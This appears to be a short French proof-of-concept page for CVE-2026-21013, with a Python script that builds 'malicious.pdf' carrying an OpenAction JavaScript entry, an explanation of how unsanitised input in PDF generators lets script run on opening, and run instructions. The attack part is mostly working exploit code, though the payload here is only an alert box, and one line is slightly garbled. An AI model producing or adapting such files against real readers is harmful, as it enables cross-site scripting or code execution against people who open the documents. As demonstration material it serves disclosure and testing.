
Génère un PDF avec JavaScript intégré pour démontrer CVE-2026-21013, une injection OpenAction conduisant à l'exécution de scripts dans les lecteurs PDF vulnérables.
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
Un générateur de PDF ne neutralise pas le contenu fourni par l’utilisateur avant de l’intégrer dans le fichier PDF. Un attaquant peut injecter une entrée JavaScript qui s’exécute à l’ouverture du document, conduisant à du cross-site scripting (dans les visionneuses web) ou à une exécution de code locale (dans les lecteurs de bureau avec prise en charge complète de JavaScript).
/OpenActionExécutez le générateur :
python generate_pdf_js_inject.py
Ouvrez le fichier malicious.pdf résultant dans un lecteur PDF prenant en charge JavaScript ; une boîte de dialogue d’alerte apparaîtra.